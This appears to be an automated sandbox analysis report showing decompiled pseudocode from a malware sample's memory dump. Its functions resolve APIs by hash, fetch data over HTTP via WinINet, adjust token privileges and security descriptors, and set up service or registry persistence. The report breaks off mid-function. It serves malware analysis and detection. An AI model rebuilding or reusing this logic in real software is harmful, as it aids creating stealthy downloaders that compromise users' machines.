Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1be7f6cf4bfdfee0b02c0963e02dc73fe288a56de6608e9d2f5f5bd22872d58f
Instruction ID: e46c0343fa532bb8effe88ac16149e570118faeff021bc0601b183ee0ee4778e
Opcode Fuzzy Hash: 1be7f6cf4bfdfee0b02c0963e02dc73fe288a56de6608e9d2f5f5bd22872d58f
Instruction Fuzzy Hash: F40186A6904304BBE6512760FC03FAA369CAB6539DF050032F90DA1343E9719A2496B2

Uniqueness

Uniqueness Score: -1.00%

Function 000E9C40, Relevance: 2.5, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E9C40(void* __eflags, void** _a4) {
				int _t6;
				int _t8;
				void** _t10;
				void* _t11;
				void* _t12;

				_t10 = _a4;
				_t6 = E000D4A90( *_t10, 0);
				_t12 = _t11 + 8;
				_t15 = _t6 & 0x00000001;
				if((_t6 & 0x00000001) == 0) {
					E000DBF50(_t15, 0, 0xb1fd105);
					_t12 = _t12 + 8;
					_t6 = VirtualFree( *_t10, 0, 0x8000); // executed
				}
				_t16 = _t10[2];
				if(_t10[2] != 0) {
					E000DBF50(_t16, 0, 0xb8e7db5);
					_t8 = CloseHandle(_t10[2]); // executed
					return _t8;
				}
				return _t6;
			}

0x000e9c44
0x000e9c4b
0x000e9c50
0x000e9c53
0x000e9c55
0x000e9c5e
0x000e9c63
0x000e9c6f
0x000e9c6f
0x000e9c71
0x000e9c75
0x000e9c7e
0x000e9c89
0x00000000
0x000e9c89
0x000e9c8d

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000E9C6F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000E9C89

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction ID: a0c1fb64f88f562c8023799055e48c389f3dc1ca3074c82e89f5ec0a8b5765c8
Opcode Fuzzy Hash: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction Fuzzy Hash: 34E0D839684314BBEA3037B1EC07F9472D49F10746F114435FA8D752EAE6A279108AB5

Uniqueness

Uniqueness Score: -1.00%

Function 000DBF50, Relevance: 1.7, APIs: 1, Instructions: 182
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000DBF50(void* __eflags, signed int _a4, signed int _a8) {
				signed int* _v20;
				char _v52;
				char _v159;
				signed int _t32;
				intOrPtr _t35;
				struct HINSTANCE__* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed int _t51;
				signed int* _t52;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				void* _t62;

				_t60 = _a8;
				_t32 = E000D9D50(0x647402c4);
				_t62 = _t61 + 4;
				_t57 = _t60 % _t32;
				_t35 =  *((intOrPtr*)(0xf2cb8 + _t57 * 4));
				_t58 = _t57;
				if(_t35 == 0) {
					L4:
					_t51 = _a4;
					_v20 = 0xf2cb8 + _t58 * 4;
					if(_t51 > 0x23) {
						L39:
						_t37 =  *(0xf2134 + _t51 * 4);
						if( *(0xf2134 + _t51 * 4) != 0) {
							L49:
							_t38 = E000DD830(_t37, _t60);
							_t52 = _v20;
							__eflags = _t38;
							if(__eflags != 0) {
								L52:
								 *_t52 = _t60;
								 *(0xf4198 + _t58 * 4) = _t38;
								return _t38;
							}
							_t39 = E000DBF50(__eflags, 0, 0xba94474);
							 *_t39(0);
							L51:
							_t38 = 0;
							goto L52;
						}
						if(_t51 == 0x17) {
							_t37 =  *0xf37cc; // 0x0
							__eflags = _t37;
							if(__eflags != 0) {
								L48:
								 *(0xf2134 + _t51 * 4) = _t37;
								goto L49;
							}
							L46:
							_t41 = E000DBF50(_t77, 0, 0xba94474);
							 *_t41(0);
							 *(0xf2134 + _t51 * 4) = 0;
							_t52 = _v20;
							goto L51;
						}
						if(_t51 == 0x16) {
							_t37 =  *0xf4b38; // 0x0
							__eflags = _t37;
							if(__eflags == 0) {
								goto L46;
							}
							goto L48;
						}
						if(_t51 != 0x15) {
							_t37 = LoadLibraryA( &_v52); // executed
							__eflags = _t37;
							if(__eflags != 0) {
								goto L48;
							}
							goto L46;
						}
						_t37 =  *0xf37d0; // 0x0
						_t77 = _t37;
						if(_t37 != 0) {
							goto L48;
						}
						goto L46;
					}
					switch( *((intOrPtr*)(_t51 * 4 +  &M000F00B0))) {
						case 0:
							L38:
							E000DC560( &_v52, E000DD0A0(0xf0550, 0xf0550,  &_v159), 0xffffffff);
							_t62 = _t62 + 0x14;
							goto L39;
						case 1:
							goto L38;
						case 2:
							__eax = 0xf0bfc;
							goto L38;
						case 3:
							__eax = 0xf0894;
							goto L38;
						case 4:
							__eax = 0xf1044;
							goto L38;
						case 5:
							__eax = 0xf05e2;
							goto L38;
						case 6:
							__eax = 0xf07e9;
							goto L38;
						case 7:
							__eax = 0xf043c;
							goto L38;
						case 8:
							__eax = 0xf0538;
							goto L38;
						case 9:
							__eax = 0xf0781;
							goto L38;
						case 0xa:
							__eax = 0xf09fc;
							goto L38;
						case 0xb:
							__eax = 0xf097c;
							goto L38;
						case 0xc:
							__eax = 0xf101b;
							goto L38;
						case 0xd:
							__eax = 0xf07a6;
							goto L38;
						case 0xe:
							__eax = 0xf068d;
							goto L38;
						case 0xf:
							__eax = 0xf0b87;
							goto L38;
						case 0x10:
							__eax = 0xf0c24;
							goto L38;
						case 0x11:
							__eax = 0xf0b75;
							goto L38;
						case 0x12:
							__eax = 0xf09bc;
							goto L38;
						case 0x13:
							__eax = 0xf04b8;
							goto L38;
						case 0x14:
							__eax = 0xf052c;
							goto L38;
						case 0x15:
							goto L39;
						case 0x16:
							__eax = 0xf0814;
							goto L38;
						case 0x17:
							__eax = 0xf0900;
							goto L38;
						case 0x18:
							__eax = 0xf0480;
							goto L38;
						case 0x19:
							__eax = 0xf076e;
							goto L38;
						case 0x1a:
							__eax = 0xf0699;
							goto L38;
						case 0x1b:
							__eax = 0xf04db;
							goto L38;
						case 0x1c:
							__eax = 0xf0c31;
							goto L38;
						case 0x1d:
							__eax = 0xf0b60;
							goto L38;
						case 0x1e:
							__eax = 0xf09c4;
							goto L38;
						case 0x1f:
							__eax = 0xf0a2c;
							goto L38;
						case 0x20:
							__eax = 0xf09a6;
							goto L38;
					}
				}
				0;
				0;
				while(1) {
					_t69 = _t35 - _t60;
					if(_t35 == _t60) {
						break;
					}
					E000D1460(_t69, _t58, 1);
					_t62 = _t62 + 8;
					_t58 =  >  ? 0 : _t58 + 1;
					_t35 =  *((intOrPtr*)(0xf2cb8 + _t58 * 4));
					if(_t35 != 0) {
						continue;
					}
					goto L4;
				}
				return  *(0xf4198 + _t58 * 4);
			}

0x000dbf5c
0x000dbf64
0x000dbf69
0x000dbf74
0x000dbf76
0x000dbf7d
0x000dbf81
0x000dbfb6
0x000dbfb6
0x000dbfc0
0x000dbfc6
0x000dc0fe
0x000dc0fe
0x000dc107
0x000dc163
0x000dc165
0x000dc16d
0x000dc170
0x000dc172
0x000dc189
0x000dc189
0x000dc18b
0x00000000
0x000dc18b
0x000dc17b
0x000dc185
0x000dc187
0x000dc187
0x00000000
0x000dc187
0x000dc10c
0x000dc127
0x000dc12c
0x000dc12e
0x000dc15c
0x000dc15c
0x00000000
0x000dc15c
0x000dc130
0x000dc137
0x000dc141
0x000dc143
0x000dc14e
0x00000000
0x000dc14e
0x000dc111
0x000dc153
0x000dc158
0x000dc15a
0x00000000
0x00000000
0x00000000
0x000dc15a
0x000dc116
0x000dc1a1
0x000dc1a7
0x000dc1a9
0x00000000
0x00000000
0x00000000
0x000dc1ab
0x000dc11c
0x000dc121
0x000dc123
0x00000000
0x00000000
0x00000000
0x000dc125
0x000dbfd1
0x00000000
0x000dc0df
0x000dc0f6
0x000dc0fb
0x00000000
0x00000000
0x00000000
0x00000000
0x000dbfee
0x00000000
0x00000000
0x000dbff8
0x00000000
0x00000000
0x000dc002
0x00000000
0x00000000
0x000dc00c
0x00000000
0x00000000
0x000dc016
0x00000000
0x00000000
0x000dc020
0x00000000
0x00000000
0x000dc02a
0x00000000
0x00000000
0x000dc034
0x00000000
0x00000000
0x000dc03e
0x00000000
0x00000000
0x000dc048
0x00000000
0x00000000
0x000dc052
0x00000000
0x00000000
0x000dc05c
0x00000000
0x00000000
0x000dc063
0x00000000
0x00000000
0x000dc06a
0x00000000
0x00000000
0x000dc071
0x00000000
0x00000000
0x000dc078
0x00000000
0x00000000
0x000dc07f
0x00000000
0x00000000
0x000dc086
0x00000000
0x00000000
0x000dc08d
0x00000000
0x00000000
0x00000000
0x00000000
0x000dc094
0x00000000
0x00000000
0x000dc09b
0x00000000
0x00000000
0x000dc0a2
0x00000000
0x00000000
0x000dc0a9
0x00000000
0x00000000
0x000dc0b0
0x00000000
0x00000000
0x000dc0da
0x00000000
0x00000000
0x000dc0b7
0x00000000
0x00000000
0x000dc0be
0x00000000
0x00000000
0x000dc0c5
0x00000000
0x00000000
0x000dc0cc
0x00000000
0x00000000
0x000dc0d3
0x00000000
0x00000000
0x000dbfd1
0x000dbf89
0x000dbf8d
0x000dbf90
0x000dbf90
0x000dbf92
0x00000000
0x00000000
0x000dbf97
0x000dbf9c
0x000dbfa8
0x000dbfab
0x000dbfb4
0x00000000
0x00000000
0x00000000
0x000dbfb4
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 000DC1A1

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e891d7d8dd0bcd5b3f96b298169c5666e23c4385346a18af07174b7f3be4c7eb
Instruction ID: b1425111ede4a8ef6384ab395aa4d373ace213ba3fd920bceb540cbec06bbc9e
Opcode Fuzzy Hash: e891d7d8dd0bcd5b3f96b298169c5666e23c4385346a18af07174b7f3be4c7eb
Instruction Fuzzy Hash: 7D514D6464831FD7F720AA98DC40E7E6A969759708F148123B606CBF43F66ADC80F672

Uniqueness

Uniqueness Score: -1.00%

Function 000DD270, Relevance: 1.6, APIs: 1, Instructions: 98
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000DD270(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				signed short _v32;
				intOrPtr _v40;
				char _v44;
				void* _t22;
				void* _t23;
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t37;
				void* _t43;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;

				_t22 = E000EFCF0(__ecx);
				_t54 =  &_v44;
				_t23 = E000E0190(__eflags, _t22,  &_v44);
				_t57 = _t56 + 8;
				_t64 = _t23;
				if(_t23 == 0) {
					_t43 = 0;
				} else {
					_t26 = E000EB790(_t64,  *0xf2838, _v44, _v32 & 0x0000ffff, _a8); // executed
					_t58 = _t57 + 0x10;
					if(_t26 == 0) {
						_t43 = 0;
					} else {
						_v20 = 1 + (0 | _v30 == 0x00000002) * 4;
						_t31 = E000EF190(__edx);
						_t32 = E000EEE10(__edx);
						_v20 = _t26;
						_t33 = E000EBAD0(_v30 - 2, _t26, _v40, 0, _t32, _t31, _v20); // executed
						_t61 = _t58 - 4 + 0x1c;
						if(_t33 == 0) {
							_t43 = 0;
							_t54 =  &_v44;
						} else {
							_t53 = _t33;
							_t37 = E000D1AF0(_t53,  &_v28, 0,  *0xf2c80); // executed
							_t62 = _t61 + 0x10;
							_t68 = _t37;
							_t54 =  &_v44;
							if(_t37 == 0) {
								_t43 = 0;
								__eflags = 0;
							} else {
								E000EF410(_v28, _a4, _v28, _v24 + _v28);
								E000DB570(_v28);
								_t62 = _t62 + 4;
								_t43 = 1;
							}
							E000DBF50(_t68, 0x13, 0x714b685);
							_t61 = _t62 + 8;
							InternetCloseHandle(_t53); // executed
						}
						E000EBA40(_t68, _v20);
						_t58 = _t61 + 4;
					}
					E000EB690(_t54);
				}
				return _t43;
			}

0x000dd27b
0x000dd280
0x000dd285
0x000dd28a
0x000dd28d
0x000dd28f
0x000dd337
0x000dd295
0x000dd2a6
0x000dd2ab
0x000dd2b0
0x000dd33b
0x000dd2b6
0x000dd2ca
0x000dd2cd
0x000dd2d6
0x000dd2e8
0x000dd2ec
0x000dd2f1
0x000dd2f6
0x000dd33f
0x000dd341
0x000dd2f8
0x000dd2f8
0x000dd307
0x000dd30c
0x000dd30f
0x000dd311
0x000dd314
0x000dd346
0x000dd346
0x000dd316
0x000dd323
0x000dd32b
0x000dd330
0x000dd333
0x000dd333
0x000dd34f
0x000dd354
0x000dd358
0x000dd358
0x000dd35e
0x000dd363
0x000dd363
0x000dd367
0x000dd36c
0x000dd378

APIs

Part of subcall function 000EB790: InternetOpenA.WININET(000F0580,?,00000000,00000000,00000000,?,000DCD77,?,?,?,00000001,00000000,?,000DCD77,?,00000001), ref: 000EB7C2
Part of subcall function 000EB790: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000EB862

Part of subcall function 000EBAD0: HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000EBBA3

Part of subcall function 000D1AF0: InternetReadFile.WININET(?,?,00040000,00040000), ref: 000D1B86

InternetCloseHandle.WININET(00000000), ref: 000DD358

Part of subcall function 000DB570: HeapFree.KERNEL32(00000000,000E54D2,000E54D2,?), ref: 000DB593

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: Internet$Open$CloseConnectFileFreeHandleHeapHttpReadRequest
String ID:
API String ID: 3651809878-0
Opcode ID: 65c4456f4ee983d0694d5aeb63b057a757b2082158d44f809fb7e986872e8634
Instruction ID: 878198f41d5c4de0f484b1b2af23c7ff00e21a0595978dc1d9ea219b2752da7d
Opcode Fuzzy Hash: 65c4456f4ee983d0694d5aeb63b057a757b2082158d44f809fb7e986872e8634
Instruction Fuzzy Hash: EB21E3B2E002096FDF00ABE59C42AFF77B99F80354F080036FA04B7243E6359A1592B2

Uniqueness

Uniqueness Score: -1.00%

Function 000E0F60, Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E000E0F60(void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v88;
				char _v288;
				void* _t18;
				intOrPtr* _t20;
				void* _t23;
				void* _t24;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				void* _t45;
				void* _t51;
				void* _t52;
				void* _t55;

				_t55 = __eflags;
				_v20 = 0;
				E000E9C90(_t55, E000D7200(0xf1060,  &_v88), 1); // executed
				_t18 = E000D9D50(0x647400a5);
				_t20 = E000DBF50(_t55, _t18, E000D9D50(0x6ec8785b));
				_t36 =  !=  ? 0xf08d0 : 0xf10b0;
				_t23 = E000D7200( !=  ? 0xf08d0 : 0xf10b0,  &_v288);
				_t51 = _t45 + 0x28;
				_t24 =  *_t20(_t23, 1,  &_v20, 0);
				_t57 = _t24;
				if(_t24 != 0) {
					_v24 = 0;
					_t26 = E000DBF50(_t57, 9, 0x8a8238c);
					_t52 = _t51 + 8;
					_t27 =  *_t26(_v20,  &_v32,  &_v24,  &_v28);
					_t58 = _t27;
					if(_t27 != 0) {
						_t30 = E000DBF50(_t58, 9, 0x90ec817);
						_t31 = E000D9D50(0x647400bc);
						_t52 = _t52 + 0xc;
						 *_t30(_a4, _a8, _t31, 0, 0, 0, _v24); // executed
					}
					_t28 = E000DBF50(_t58, 0, 0x982abe5);
					 *_t28(_v20);
				}
				return 1;
			}

0x000e0f60
0x000e0f72
0x000e0f8a
0x000e0f97
0x000e0fb0
0x000e0fc6
0x000e0fd1
0x000e0fd6
0x000e0fe2
0x000e0fe4
0x000e0fe6
0x000e0fe8
0x000e0ff6
0x000e0ffb
0x000e100d
0x000e100f
0x000e1011
0x000e101d
0x000e102f
0x000e1034
0x000e1043
0x000e1043
0x000e104c
0x000e1057
0x000e1057
0x000e1065

APIs

Part of subcall function 000E9C90: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000E9D70

Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1

SetNamedSecurityInfoW.ADVAPI32(00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 000E1043

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: AdjustInfoLibraryLoadNamedPrivilegesSecurityToken
String ID:
API String ID: 2785814242-0
Opcode ID: 6fe259c01ef67b7cc189717ec2dce269b636c8989209d454dcefa2ca4b939fd7
Instruction ID: 68e6f47e4325ee5f68fc7d3a369088079ae6207472bae5faae913c2bd54c773a
Opcode Fuzzy Hash: 6fe259c01ef67b7cc189717ec2dce269b636c8989209d454dcefa2ca4b939fd7
Instruction Fuzzy Hash: F221C7B1D4025D7BEB20A7A0EC03FFF3668DB11744F050425FA18B6383F5A16A1486F2

Uniqueness

Uniqueness Score: -1.00%

Function 000E2F00, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E000E2F00(void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v56;
				char _v84;
				char _v118;
				char _v160;
				intOrPtr* _t9;
				intOrPtr* _t13;
				intOrPtr* _t16;
				struct HINSTANCE__* _t17;
				WCHAR* _t19;
				struct HWND__* _t22;
				char* _t25;

				_t36 = __eflags;
				_t25 =  &_v56;
				E000E8F20(_t25, 0x28);
				_v52 = E000E1070;
				_t9 = E000DBF50(__eflags, 0, 0xa39ecc7);
				_v40 =  *_t9(0);
				_v20 = E000D7200(0xf0c10,  &_v118);
				_t13 = E000DBF50(_t36, 1, 0x38227e7);
				 *_t13(_t25);
				E000DBF50(_t36, 1, 0xf3c7b77);
				_t16 = E000DBF50(_t36, 0, 0xa39ecc7);
				_t17 =  *_t16(0);
				_t19 = E000D7200(0xf0790,  &_v84);
				_t22 = CreateWindowExW(0, E000D7200(0xf0c10,  &_v160), _t19, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, _t17, 0); // executed
				return _t22;
			}

0x000e2f00
0x000e2f0c
0x000e2f12
0x000e2f1a
0x000e2f28
0x000e2f34
0x000e2f48
0x000e2f52
0x000e2f5b
0x000e2f64
0x000e2f75
0x000e2f7f
0x000e2f8c
0x000e2fce
0x000e2fda

APIs

Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1

CreateWindowExW.USER32(00000000,00000000,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000E2FCE

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: CreateLibraryLoadWindow
String ID:
API String ID: 4174337752-0
Opcode ID: 176a125fb5729b2053fa5b20d57012cc61f4a16095ae188c0ab2b86fb45e9d12
Instruction ID: fd95230cfb0f725b8e39e5a86ac2c88b2b8a6ed407f542fb8bb29a5c305af805
Opcode Fuzzy Hash: 176a125fb5729b2053fa5b20d57012cc61f4a16095ae188c0ab2b86fb45e9d12
Instruction Fuzzy Hash: AB111276E843187AF76066B0AC03FFE3658DB51B05F650126FF0C79287F5912A1446F6

Uniqueness

Uniqueness Score: -1.00%

Function 000D1490, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E000D1490(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
				signed int _v20;
				char _v540;
				void* _t16;
				long _t23;
				intOrPtr* _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;
				void* _t31;
				void* _t33;

				_t27 = _a20 & 0x000000ff;
				_t28 = 0;
				_v20 = _a24 & 0x000000ff;
				do {
					_t14 =  &_v540;
					E000D5CD0(_t35, _a4,  &_v540, _t27, _v20);
					_t16 = E000E8960(_a12, _a8, _t14);
					_t33 = _t31 + 0x1c;
					if(_t16 == 0) {
						goto L2;
					}
					_t37 = _a16;
					if(_a16 == 0) {
						L1:
						E000DBF50(__eflags, 0, 0xbf8ba27);
						_t33 = _t33 + 8;
						_t23 = GetFileAttributesW(_a12); // executed
						__eflags = _t23 - 0xffffffff;
						if(__eflags == 0) {
							return 1;
						}
						goto L2;
					}
					_t25 = E000DBF50(_t37, 3, 0xd85c117);
					_t33 = _t33 + 8;
					_t26 =  *_t25(_a12, _a16);
					_t38 = _t26;
					if(_t26 != 0) {
						goto L1;
					}
					L2:
					_t30 = E000D22E0(_t38, 0,  !_t28);
					E000D1460(_t38, _t28, 1);
					_t31 = _t33 + 0x10;
					_t35 = _t30 - 0x64;
					_t28 = _t30;
				} while (_t30 != 0x64);
				return 0;
			}

0x000d14a0
0x000d14a4
0x000d14a6
0x000d14ec
0x000d14f0
0x000d14fc
0x000d150b
0x000d1510
0x000d1515
0x00000000
0x00000000
0x000d1517
0x000d151b
0x000d14b0
0x000d14b7
0x000d14bc
0x000d14c2
0x000d14c4
0x000d14c7
0x00000000
0x000d1542
0x00000000
0x000d14c7
0x000d1524
0x000d1529
0x000d1532
0x000d1534
0x000d1536
0x00000000
0x00000000
0x000d14c9
0x000d14d8
0x000d14dd
0x000d14e2
0x000d14e5
0x000d14e8
0x000d14e8
0x00000000

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction ID: 9c993c277cb76a85e52fb5033ff05b1446fa905e90729c66426f93c5330b5bb0
Opcode Fuzzy Hash: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction Fuzzy Hash: F1110D71940319BBDF112E64AC02BFE3AA99F50355F040123FC29A5397F936CE3096B1

Uniqueness

Uniqueness Score: -1.00%

Function 000E58D0, Relevance: 1.6, APIs: 1, Instructions: 58
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000E58D0(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
				char _v17;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v66;
				char _v124;
				char _v238;
				char _v1278;
				char _v1794;
				void* __esi;
				signed char _t35;
				signed char _t37;
				void* _t38;
				intOrPtr* _t40;
				signed char _t44;
				intOrPtr* _t45;
				signed char _t47;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t63;
				void* _t64;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t113;
				void* _t116;

				_t116 = __eflags;
				_push(__eax);
				_t86 = __edx;
				_t69 = __ecx;
				_v17 = _a4;
				_t89 = L000DC1E0(0x1c);
				E000EED20(_t30);
				L000EFA50(_t89, _t69);
				_t3 = _t89 + 0xc; // 0xc
				_t77 = _t3;
				L000EFA50(_t3, __edx);
				 *((char*)(_t89 + 0x18)) = _v17;
				_t35 = E000E9AC0(_t116, 0xffffffff); // executed
				_t37 = E000D4350(_t35 & 0x000000ff, 4);
				_t98 = _t95 + 0x10;
				_t117 = _t37 & 0x00000001;
				if((_t37 & 0x00000001) != 0) {
					_t77 = _t89;
					_t98 = _t98 + 4;
					_pop(_t89);
					_pop(_t86);
					_pop(_t69);
					_pop(_t93);
					_t90 = _t77;
					_t38 = E000EFCF0(_t77 + 0xc);
					_t87 =  &_v1794;
					E000E7700(_t87, _t38, 0xffffffff);
					_t40 = E000DBF50(_t117, 3, 0x5ea9ec7);
					 *_t40(_t87, _t89, _t86, _t69, _t93);
					_t44 = E000D4350(E000E9AC0(_t117, 0xffffffff) & 0x000000ff, 4);
					_t103 = _t98 - 0x6f4 + 0x20;
					if((_t44 & 0x00000001) != 0) {
						_t45 = E000DBF50(__eflags, 9, 0x28243c7);
						_t70 =  *_t45(0, 0, 2);
						_t47 = E000DA500(__eflags, _t46, 0);
						_t105 = _t103 + 0x10;
						__eflags = _t47 & 0x00000001;
						if((_t47 & 0x00000001) == 0) {
							__eflags =  *((char*)(_t90 + 0x18));
							_v24 = _t70;
							if( *((char*)(_t90 + 0x18)) == 0) {
								E000E7700( &_v1278, _t87, 0xffffffff);
								_t107 = _t105 + 0xc;
							} else {
								E000ED650(E000D7200(0xf0840,  &_v66),  &_v1278, 0x208, _t60, _t87);
								_t107 = _t105 + 0x18;
							}
							_t50 = E000DBF50(__eflags, 9, 0x42453f7);
							_t108 = _t107 + 8;
							_v28 = _t50;
							_t51 = E000EFCF0(_t90);
							_t52 = E000EFCF0(_t90);
							_t88 = _v24;
							_t53 = _v28(_t88, _t52, _t51, 0xf01ff, 0x110, 2, 0,  &_v1278, 0, 0, 0, 0, 0);
							__eflags = _t53;
							if(__eflags != 0) {
								_t57 = E000DBF50(__eflags, 9, 0x48eed75);
								_t108 = _t108 + 8;
								 *_t57(_t53);
							}
							_t54 = E000D9D50(0x647400a5);
							_t56 = E000DBF50(__eflags, _t54, E000D9D50(0x60faedd9));
							_t105 = _t108 + 0x10;
							_t47 =  *_t56(_t88);
						}
					} else {
						_t63 = E000D7200(0xf0c50,  &_v238);
						_t112 = _t103 + 8;
						_t119 =  *((char*)(_t90 + 0x18));
						_v24 = _t63;
						if( *((char*)(_t90 + 0x18)) == 0) {
							_t64 = E000DBA30(__eflags, _t87);
							_t113 = _t112 + 4;
						} else {
							_t67 = E000D7200(0xf0840,  &_v124);
							_t68 = E000D9D50(0x647402a4);
							_t84 =  &_v1278;
							_t87 =  &_v1278;
							_t64 = E000ED650(_t68, _t84, _t68, _t67,  &_v1278);
							_t113 = _t112 + 0x1c;
						}
						_t47 = E000E2450(_t119, 0x80000001, _v24, E000EFCF0(_t90), _t87, _t64);
						_t105 = _t113 + 0x14;
					}
					return _t47;
				} else {
					__eax = E000DBF50(__eflags, 0, 0xa0733d4);
					__eax = CreateThread(0, 0, E000DBE30, __esi, 0, 0); // executed
					__esp = __esp + 4;
					return __eax;
				}
			}

0x000e58d0
0x000e58d6
0x000e58da
0x000e58dc
0x000e58de
0x000e58ed
0x000e58ef
0x000e58f7
0x000e58fc
0x000e58fc
0x000e5900
0x000e5908
0x000e590d
0x000e591b
0x000e5920
0x000e5923
0x000e5925
0x000e594e
0x000e5950
0x000e5953
0x000e5954
0x000e5955
0x000e5956
0x000e223c
0x000e2241
0x000e2246
0x000e2250
0x000e225f
0x000e2268
0x000e227a
0x000e227f
0x000e2284
0x000e22e4
0x000e22f4
0x000e22f9
0x000e22fe
0x000e2301
0x000e2303
0x000e2309
0x000e230d
0x000e2310
0x000e236f
0x000e2374
0x000e2312
0x000e2331
0x000e2336
0x000e2336
0x000e237e
0x000e2383
0x000e2388
0x000e238b
0x000e2394
0x000e23ba
0x000e23be
0x000e23c1
0x000e23c3
0x000e23ce
0x000e23d3
0x000e23d7
0x000e23d7
0x000e23de
0x000e23f7
0x000e23fc
0x000e2400
0x000e2400
0x000e2286
0x000e2292
0x000e2297
0x000e229a
0x000e229e
0x000e22a1
0x000e233c
0x000e2341
0x000e22a7
0x000e22b0
0x000e22bf
0x000e22c7
0x000e22d1
0x000e22d3
0x000e22d8
0x000e22d8
0x000e2358
0x000e235d
0x000e235d
0x000e240c
0x000e5927
0x000e592e
0x000e5944
0x000e5946
0x000e594d
0x000e594d

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000BE30,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 000E5944

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0111cc39bd56185ea40b0aee6db3e3beac92bf6fbfc8b2169cda9f3754f4927f
Instruction ID: fd5edb3017c0c55ca8e7c087e2c10e312bf67093828373a6bab180a0a04da777
Opcode Fuzzy Hash: 0111cc39bd56185ea40b0aee6db3e3beac92bf6fbfc8b2169cda9f3754f4927f
Instruction Fuzzy Hash: 3B01FCA5B843983AE92061AA3C03FFF7B5C4B91775F080075FA5DAA3C3D851661491F3

Uniqueness

Uniqueness Score: -1.00%

Function 000EB710, Relevance: 1.6, APIs: 1, Instructions: 50
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000EB710(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _t5;
				intOrPtr* _t8;
				void* _t10;
				intOrPtr* _t11;
				void* _t15;
				void* _t17;

				E000DBF50(__eflags, 0, 0xee41457);
